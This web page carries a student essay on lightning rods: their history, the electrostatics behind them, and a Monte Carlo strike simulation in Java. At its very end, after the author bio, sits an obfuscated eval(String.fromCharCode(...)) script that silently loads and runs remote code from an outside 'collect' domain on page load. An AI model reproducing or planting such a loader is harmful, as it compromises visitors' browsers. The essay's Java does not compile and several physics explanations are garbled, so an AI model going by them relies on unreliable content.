<p>Lightning rods, mostly made of copper, is a structure that protects buildings from being damaged by attracting flashes through electric-magnetic force and guide the current to the ground. After learning a bit about electricity and experiencing a night of thunder and lightning, I intend to explore how lightning rods work. Therefore, in this presentation, I will first introduce the historical research on lightning rods, and then explain how lightning rods work in general using electrostatic principles and some easy-to-understand analogies. I will then write a program to calculate the effective range of the lightning rod based on the Monte Carlo technique and finally propose a lightning protection solution in conjunction with the 3D street view.</p>



<h2 class="wp-block-heading">2. The History of Lightning Rod</h2>



<h4 class="wp-block-heading">2.1 Franklin Kite Experiment</h4>



<p>In 1746, Franklin turned his home into an electrical laboratory after occasionally discovering the electrical experiments of other scientists, and in a letter he described receiving an electric shock as &#8220;a numbing sensation from the beginning to the end&#8221;.</p>



<p>In 1747, thanks to Franklin&#8217;s discoveries, people stopped using glassy and resinous to describe electricity. They began to use positive and negative electricity.</p>



<p>In 1749, Franklin began to make analogies between lightning and batteries, and from then on lightning became palpable. He explained by analogy the bifurcation in lightning, the color of the lightning, and the deafening sound, and was determined to prove that lightning and electricity were directly related. in 1750, he began to focus his research on the protective devices for lightning. This was man&#8217;s first step toward the lightning rod</p>



<p>Fifteen years later, Franklin&#8217;s close friend recorded in his diary Franklin&#8217;s famous kite experiment. He took the risk of using a kite to try to get up close and personal with lightning. He even tied a key to the kite in order to attract an electrical charge. Even though the string of the kite was already made of insulating silk, this was still a very risky act considering the strength of the lightning bolt could even make the insulator relatively conductive. The conclusion of this experiment was that the key was seen to receive the electric charge brought by the lightning, and Franklin thus proved that lightning is electricity.</p>



<h4 class="wp-block-heading">2.2 Tip Lightning Rod or Round-end Ones?</h4>



<p>Almost simultaneously with the kite experiment, Franklin realized the fact that iron needles can conduct electricity, and tried to integrate this into the &#8220;lightning rod&#8221; invention. In his diary, he envisioned, &#8220;Could there be a way to protect people from sudden lightning strikes by inserting thin needles directly into clouds and pulling the electricity out of them before the lightning strikes the ground?&#8221;</p>



<p>Franklin focused on elevating the tip of the lightning rod, while Benjamin Wilson, a member of the Royal Court circle of George III, believed that the pointed lightning rod would attract lightning (and this property remained unchanged and became the main principle of the modern lightning rod) and was not as safe as the round-headed lightning rod. Most scholars at the time also supported Benjamin Wilson&#8217;s view, so much so that this eventually turned into a political showdown, with proponents of Franklin&#8217;s lightning rod being falsely accused of &#8220;trying to establish their own political group in England. The war between science and politics officially ended when an East India Company was struck by lightning, and Franklin&#8217;s spiked design is still used today.</p>



<h4 class="wp-block-heading">2.3 Three primary Modern lightning rods</h4>



<h5 class="wp-block-heading">2.3.1 Early Streamline Emmision (ESE)</h5>



<p>ESE systems are more similar to conventional lightning rods. They are designed to trigger early initiation of upward flow, which increases the effective protection range. This discharge trigger increases the probability of triggering a &#8220;streamline&#8221; discharge at or near the tip of the rod as the ionized &#8220;leader&#8221; approaches.&nbsp;</p>



<div class="wp-block-image"><figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="566" height="516" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-37.png" alt="" class="wp-image-1270" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-37.png 566w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-37-300x273.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-37-230x210.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-37-350x319.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-37-480x438.png 480w" sizes="(max-width: 566px) 100vw, 566px" /><figcaption><meta charset="utf-8">Fig 1 Early Streamline Emmision(plotted by AXIS house)</figcaption></figure></div>



<h5 class="wp-block-heading">2.3.2 Charge Transfer System (CTS)</h5>



<p>The CTS is characterized by its designated protection zone. It is the only system that deters lightning strikes, rather than encouraging them. CTS technology is based on existing physical and mathematical principles. The CTS collects the induced charge from the thunderstorm clouds in the area and transfers it to the surrounding air via an ionizer, thereby reducing the electric field strength in the protected area.&nbsp; The resulting reduction in the potential difference between the site and the clouds inhibits the formation of upward currents and thus reduces electric shocks.</p>



<div class="wp-block-image"><figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="296" height="432" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-38.png" alt="" class="wp-image-1272" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-38.png 296w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-38-206x300.png 206w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-38-230x336.png 230w" sizes="(max-width: 296px) 100vw, 296px" /><figcaption><meta charset="utf-8">&nbsp;Fig 2 Charge Transfer System</figcaption></figure></div>



<h5 class="wp-block-heading">2.3.3 Dissipation Array System (DAS)</h5>



<p>DAS is a special type of CTS. Based on the &#8220;protected area&#8221; of CTS, DAS can completely isolate a facility from direct lightning strikes during a thunderstorm by releasing the induced charge within the protected area to 55% of its pre-installation level in relation to its surroundings. When the electric field is reduced, the upward current does not get enough energy, and it is the connection of the upward and downward currents that is required for lightning to occur. Without energy, the connection cannot be made, so lightning cannot be generated.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-39.png" alt="" class="wp-image-1273" width="466" height="327" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-39.png 750w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-39-300x210.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-39-230x161.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-39-350x245.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-39-480x337.png 480w" sizes="(max-width: 466px) 100vw, 466px" /><figcaption><meta charset="utf-8">Fig 3 Dissipation Array System (DAS) (Plotted by India Mart)</figcaption></figure></div>



<h2 class="wp-block-heading">3. The working principle of the lightning rod</h2>



<h4 class="wp-block-heading">3.1 Electron distribution</h4>



<h5 class="wp-block-heading">3.1.1 Electrons in the earth&#8217;s crust</h5>



<p>Before asking how lightning rods come into use, let’s first examine the function of electrons that makes lightning occurs. Before we go into how lightning rods work, let&#8217;s take a look at how electrons work to cause lightning. To begin with, the ground&#8217;s surface is made up of positive charges because the dipole cloud produces an electric field that forces electrons to flow to the earth&#8217;s core. The earth&#8217;s crust is plainly devoid of negatively charged electrons, resulting in a positively charged ground. Colors have been employed to depict the phase cancellation process, with yellow indicating negative charges and blue representing positive charges. The green hue created by combining blue and yellow is neutral, but the absence of either color gives it a bluish/yellowish appearance.</p>



<p>The positive charge upon the&nbsp;ground produces an electric field between the earth and the clouds, resulting in a negative charge covering the bottom of the clouds. And this electric field can reach 400,000 volts, creating a powerful electric field that lingers in the atmosphere. The procedure of positive and negative charge exchange in the clouds is essentially like an ion engine that repels the negative charge of the entire planet to the opposite side, according to the principle that different charges attract and the same charges repel.</p>



<p>We all know that when the electric field&#8217;s dipole reaches a particular level, clouds unleash lightning, which neutralizes the charge at the cloud&#8217;s bottom compared to the ground, and then the clouds repeat the process to rebuild the potential difference in the form of an exponential equation. Here&#8217;s a visual representation of this.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-40-1024x678.png" alt="" class="wp-image-1274" width="561" height="371" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-1024x678.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-300x199.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-768x509.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-1536x1018.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-2048x1357.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-920x610.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-230x152.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-350x232.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-40-480x318.png 480w" sizes="(max-width: 561px) 100vw, 561px" /><figcaption>Fig 4. Resetting time. At t=5 the cloud releases the lightning</figcaption></figure></div>



<p>The time it takes to recharge is known as the resetting time, and we use it to determine the power of the ion pump described before, for which we have data of around 5 seconds. I=Q/T. When the experiment is replaced, the result is a cloud with a charge of -20C and a resetting time of 5 seconds.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM.png" alt="" class="wp-image-1275" width="394" height="205" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM.png 826w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM-300x156.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM-768x400.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM-230x120.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM-350x182.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-19-at-10.25.35-PM-480x250.png 480w" sizes="(max-width: 394px) 100vw, 394px" /></figure></div>



<p>Despite the fact that 4 amps may appear to be a little quantity, comparable to double the current of a mobile phone charger (2A) or the current used in street lights (4A), it will inflict a great deal of damage due to the fact that it is released from a very small hole.</p>



<h5 class="wp-block-heading">3.1.2 Electrons in clouds</h5>



<p>Clouds that carries lightning consists soft hail particles and ice particles. Soft hails has more weight than ice particles, therefore they fall to the bottom during a thunderstorm while the small crystals were uplifted to the top. This falling process allowed negatively charged hails stay at the bottom(6-8km) and positively charged ice floats to the upper part of the cloud to 10km.</p>



<h5 class="wp-block-heading">3.1.3 Generation of lightning</h5>



<p>There are three major hypothesis about how lightning comes into place.&nbsp;</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-41.png" alt="" class="wp-image-1276" width="480" height="409" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-41.png 712w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-41-300x255.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-41-230x196.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-41-350x298.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-41-480x409.png 480w" sizes="(max-width: 480px) 100vw, 480px" /></figure></div>



<ul class="wp-block-list"><li>The electric field inside a stormy cloud is far higher that what has been calibrated.&nbsp;</li></ul>



<ul class="wp-block-list"><li>Lightning is created via hydrometeors, which means water particles in the cloud</li><li>Energetic runaway electrons initiate the lightning.</li></ul>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-42.png" alt="" class="wp-image-1277" width="201" height="60" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-42.png 388w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-42-300x90.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-42-230x69.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-42-350x105.png 350w" sizes="(max-width: 201px) 100vw, 201px" /></figure>



<p>&nbsp;Because the overactive electrons (hypothesis 3) in the above figure are hydrometeors (hypothesis 2), ice crystals and water droplets traveling through the cloud, and the situation presented by hypothesis 2 usually boosts the electric field strength by a large margin, due to the equation of Coulomb&#8217;s law, these three points are actually interconnected.</p>



<p>It can be found that the electric field strength is inversely proportional to the square of the distance. Thus overactive electrons are in between many electrons of different charges, causing a huge electric field and thus the birth of lightning.</p>



<p>Most lightning is intra-cloud lightning, while lightning that occurs outside of clouds is divided into four main types, two from the ground to the thunderclouds, which are beyond the scope of this report, and two from the thunderclouds to the ground. One of them is downward lightning negatively-charged leader caused by a negative charge at the bottom of the cloud and a positive charge for activation, and the other is downward lightning positively-charged leader caused by a negative charge leading from the positive charge at the top of the cloud connected to the ground charged leader.</p>



<div class="wp-block-image"><figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="441" height="523" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-43.png" alt="" class="wp-image-1278" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-43.png 441w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-43-253x300.png 253w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-43-230x273.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-43-350x415.png 350w" sizes="(max-width: 441px) 100vw, 441px" /><figcaption><br>Fig 6 cloud-to-ground lightning flashes</figcaption></figure></div>



<h4 class="wp-block-heading">3.2 Lightning propagation methods</h4>



<p>The negative step leader, as its name suggests, will extend the length of the leader channel by step propagation. In the study of lightning pathways, early studies based on photography were skewed because some of the steps were too tiny to be seen with the human eye. The multiple-station dE/dt technique was utilized by J. Howard, M.A. Uman, C. Biagi, D. Hill, V.A. Rakov, and D.M. Jordan in 2011 to localize each step. When Step brings the lightning to the ground, the length charge is around 10<sup>-3</sup>C/m, and the earth sends a return stroke to contact with it, resulting in lightning. TThis generally happens in the conductor nearest to the elevation, since lightning, like an item in an automated pathfinding system, will want to walk on the side with the least &#8220;resistance,&#8221; that is, the side with the quickest potential reduction movement. Because the charges at the ground and at the bottom of the cloud are generally different, the ground attracts the leader in this scenario.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-44.png" alt="" class="wp-image-1279" width="376" height="441" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-44.png 500w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-44-256x300.png 256w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-44-230x270.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-44-350x411.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-44-480x564.png 480w" sizes="(max-width: 376px) 100vw, 376px" /><figcaption><meta charset="utf-8">Fig 7 This graph shows four main lightning strokes that have been witnessed in Florida, which records the waveform of the electric field they generate</figcaption></figure></div>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-45.png" alt="" class="wp-image-1280" width="369" height="453" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-45.png 500w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-45-244x300.png 244w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-45-230x282.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-45-350x430.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-45-480x589.png 480w" sizes="(max-width: 369px) 100vw, 369px" /></figure></div>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-46.png" alt="" class="wp-image-1281" width="519" height="350" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-46.png 866w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-46-300x202.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-46-768x518.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-46-230x155.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-46-350x236.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-46-480x324.png 480w" sizes="(max-width: 519px) 100vw, 519px" /><figcaption><br>Fig 9. The figure shows the path of lightning in 10 video frames plotted by Biagi et al. The lightning originates from a 150 m high cloud layer and the return stroke is shown in frame 10.[Source: Adapted from Biagi et al.]</figcaption></figure></div>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-47.png" alt="" class="wp-image-1282" width="500" height="438" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-47.png 592w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-47-300x263.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-47-230x202.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-47-350x307.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-47-480x421.png 480w" sizes="(max-width: 500px) 100vw, 500px" /><figcaption><br>Fig 10 The figure shows a zoomed-in schematic of the first 9 frames of the leader, and it is easy to see the trend with increased contrast and brightness.[Source: Adapted from Biagi et al.]</figcaption></figure></div>



<h4 class="wp-block-heading">3.3 How do conductors work?</h4>



<p>&nbsp;A conductor is a substance that electrons are relatively free to move compared to the insulators, which is the property needed to create the lightning rod&#8211;any net charge resides on the surface because ρ=0 inside a conductor according to Gauss’s law. So that negative charges are attaching on the surface of the lightning rod, making it easy to be strike. The reason is, usually a ground is conductive and there are negative charges throughout the ground. When you put a conductor such as a metal on the ground, the electrons of the ground moved to the metal, and the protons in the metal moved to the ground until the metal and the ground are equipotential and the metal and the ground can be regard as a system because of the formula E = -⊽ V , Where E represents the electric field and it equals the negative product of divergence of electric potential. When the system is a closed loop the divergence is 0 so that there is no electric field and electrons are static again. The metal can then be seen as a whole with the ground. This reasoning is also valid for conductive buildings and lightning rods, which become more vulnerable to lightning strikes as if they were a mountain range raised on the natural landscape.</p>



<p>What will the lightning rods do to the lightning that it had intercepted? When lightning occurs, the lightning rod can attract the discharge channel of lightning, so that the lightning current flows from the lightning rod into the earth&#8217;s land, avoiding huge currents to cause damage to buildings, equipment, trees or injury to people or animals that happen to walk above the ground.</p>



<h2 class="wp-block-heading">4. The effective area of lightning rods.</h2>



<h4 class="wp-block-heading">4.1 Monte Carlo Technique</h4>



<p>Abhay Srivastava calculated the protection of the lightning rods by applying a mathematic model conducting rod using Monte Carlo technique. It is a computer simulated model that randomized the distribution of lightning strokes. It assumes a concave lateral surface of the cone, using the concept of striking distance <img loading="lazy" decoding="async" width="80" height="34" class="wp-image-1293" style="width: 80px;" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-20-at-9.44.40-PM.png" alt="">&nbsp;in Golde’s formula, where d<sub>s</sub> means the striking distance, A=10 and  σ = .65&nbsp; are constants.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-53-756x1024.png" alt="" class="wp-image-1295" width="436" height="591" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-756x1024.png 756w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-221x300.png 221w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-768x1040.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-920x1246.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-230x312.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-350x474.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53-480x650.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-53.png 1010w" sizes="(max-width: 436px) 100vw, 436px" /><figcaption><meta charset="utf-8">&nbsp;Fig 11 The coordinate system of the model</figcaption></figure></div>



<p>&nbsp;As the graph suggests, it initialized the sky with height k, the starting point of the lightning as h0, which will randomly stepping down towards the ground until it sees a postive charged object in its detecting sphere, which is assigned H<sub>n</sub>. H<sub>n-1</sub> and H<sub>n-2</sub> are the last two steps from the striking point, and each point in this graph is given a three dimension coordinate.</p>



<p>The author assumes that the cube is 100*100*1000, and that a Cumulonimbus Cloud capable of storing lightning has a height of 500-16,000 meters.</p>



<p>The lightning will begin at a random location at the maximum height,1000m.</p>



<p><code>int[][] origin=new int[Math.random()*101][Math.random()*101];</code></p>



<p>In 5% to 80% range of the striking distance it generate some random variables to select the step length of leader.。Then it designate two angels&nbsp; of the spherical polar coordinates: the inclination angle α lying between&nbsp;<meta charset="utf-8">π/2 &nbsp;and 3<meta charset="utf-8">π/2 and the azimuthal angle β lying between 0 and 2π.&nbsp;</p>



<p>The mathematic formula is as follow. Iteration in Java should be used to infer where the lightning will strike. The loop terminates when the program determines that the lightning leader has reached the monitoring range, which is simulated as a sphere of radius 20m.</p>



<p><code>/*</code></p>



<p><code>*Precondition: it checks every step of the lightening</code></p>



<p><code>*Postcondition: true means that the lightning has successfully been&nbsp;</code><br><meta charset="utf-8"><code>*intercepted, and therefore will not be accounted as lightenings that have&nbsp;</code></p>



<p><code>*caused damage.</code></p>



<p><code>*/</code></p>



<p><code>Public boolean inRegion(Object leader,int r){</code></p>



<p><code>if(Math.sqrt(Math.pow(leader.getx()-rod.getx(),2)+Math.pow(leader.gety()-rod.gety(),2)+Math.pow(leader.getz()-rod.getz(),2)&lt;=r)}</code></p>



<p><code>//Euclidean distance</code></p>



<p><code>return true;</code></p>



<p><code>return false;</code></p>



<p><code>}</code></p>



<p>Then comes the main program for generating the path, written according to the following mathematical equation.</p>



<p><code>public int[][] stepProcess(int[][] before,Object leader,int r){</code></p>



<p><code>int[][] after=int[][] before;</code></p>



<p><code>I=leader.getx();</code></p>



<p><code>j=leader.getz();</code></p>



<p><code>K=leader.gety();</code></p>



<p><code>while(k!=0&amp;&amp;!inRegion(leader,r)){</code></p>



<p><code>i=i+r*Math.sin( )*Math.cos(β);</code></p>



<p><code>j=j+r*Math.sin( )*Math.sin(β);</code></p>



<p><code>k=k+r*Math.sin( );</code></p>



<p><code>}</code></p>



<p><code>if(inRegion(leader,r)){</code></p>



<p><code>return before;</code></p>



<p><code>}</code></p>



<p><code>else{</code></p>



<p><code>after[i][j]=after[i][j]+1;</code></p>



<p><code>return after;</code></p>



<p><code>}</code></p>



<p><code>//the higher the number in the array is, the more dangerous is the area</code></p>



<p><code>}</code></p>



<p>After running the program, I tested 1000 times, assuming 10 strikes per year in this area, which would be all the lightning this virtual area has suffered in 100 years, and drew a graph of the conclusions drawn, where the yellow area represents relative safety(have been struck once), green represents absolute safety, and red represents danger(more than once).</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-54-679x1024.png" alt="" class="wp-image-1298" width="503" height="759" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-679x1024.png 679w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-199x300.png 199w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-768x1158.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-1019x1536.png 1019w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-920x1387.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-230x347.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-350x528.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54-480x723.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-54.png 1047w" sizes="(max-width: 503px) 100vw, 503px" /><figcaption><br>&nbsp;Fig 12/13 The output of the program</figcaption></figure></div>



<h4 class="wp-block-heading">&nbsp;4.2 Real Life Application</h4>



<p>In the 3D street view of Gaudet Map, I intercepted a dense map of high-rise buildings of about 1000*1000 and used the model for the simulation of lightning rod placement. It is assumed that all the buildings need protection, but we can ignore the open space. Here are the before-after graph of the map. When lightning rods were applied in that area, it meant to make sure every building to stay in the green or yellow circle of fig 12/13, which take the height of the lightning rods, r, as a variable and execute the program.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-55-1024x601.png" alt="" class="wp-image-1299" width="488" height="286" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-1024x601.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-300x176.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-768x451.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-1536x901.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-2048x1201.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-920x540.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-230x135.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-350x205.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-55-480x282.png 480w" sizes="(max-width: 488px) 100vw, 488px" /><figcaption>&#8216;<br>Fig 14 An actual overview of Lujiazui</figcaption></figure></div>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-56-1024x577.png" alt="" class="wp-image-1300" width="565" height="318" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-1024x577.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-300x169.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-768x433.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-1536x866.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-2048x1155.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-920x519.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-230x130.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-350x197.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-56-480x271.png 480w" sizes="(max-width: 565px) 100vw, 565px" /><figcaption><br>Fig 15 Protection after applying the program.&nbsp;</figcaption></figure></div>



<h2 class="wp-block-heading">5. Reference List</h2>



<p>1.“Modern Lightning Protection Lightning Rods with Lightning Eliminators.” Edited by LEC By admin, LEC, 19 Sept. 2018, www.lightningprotection.com/lightning-rods-are-old-new-lightning-protection-part-3/.&nbsp;</p>



<p>2. J. Howard, M.A. Uman, C. Biagi, D. Hill, V.A. Rakov, D.M. Jordan, Measured close lightning leader-step electric-field-derivative waveforms, J. Geophys.&nbsp;</p>



<p>Res. 116 (2011) http://dx.doi.org/10.1029//2010JD015249.&nbsp;</p>



<p>3. E.P. Krider, C.D. Weidman, R.C. Noggle, The electric field produced by lightning stepped leaders, J. Geophys. Res. 82 (1977) 951–960.</p>



<p>4. Srivastava, Abhay, and Mrinal Mishra. “Lightning Modeling And Protection Zone Of Conducting Rod Using Monte Carlo Technique &#8211; ScienceDirect.” Lightning Modeling And Protection Zone Of Conducting Rod Using Monte Carlo Technique &#8211; ScienceDirect, Www.sciencedirect.com, 13 June. 2013, https://www.sciencedirect.com/science/article/pii/S0307904X13003478?via%3Dihub.</p>



<p>“Franklin&#8217;s Lightning Rod | The Franklin Institute.” The Franklin Institute, Www.fi.edu, 8 March. 2014, https://www.fi.edu/history-resources/franklins-lightning-rod.</p>



<p>5. Godwin, Ian . “Franklin Letter To King Fans Flames Of Lightning Debate › News In Science (ABC Science).” Franklin Letter To King Fans Flames Of Lightning Debate › News In Science (ABC Science), Www.abc.net.au, 26 March. 2003, https://www.abc.net.au/science/articles/2003/03/26/816484.htm.</p>



<p>6. M. Vargas, H. Torres. On the development of a lightning leader model for tortuous or branched channels – Part II: model description</p>



<p>7. J. Electrostat., 66 (2008), pp. 489-495</p>



<p>8. M.A. Uman, The Lightning Discharge, Academic Press, London, 1987, 376 pages, revised paperback edition, Dover, New York, 2001.&nbsp;</p>



<p>9. K. Berger, Blitzstrom-Parameter von Aufwärtsblitzen, Bull. Schweiz. Elektrotech. Ver. 69 (1978) 353–360.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Douyun (Winnie) Shi</h5><p>Winnie is a Physics learner at the Starriver Bilingual School in Shanghai, China.
</p></figure></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/<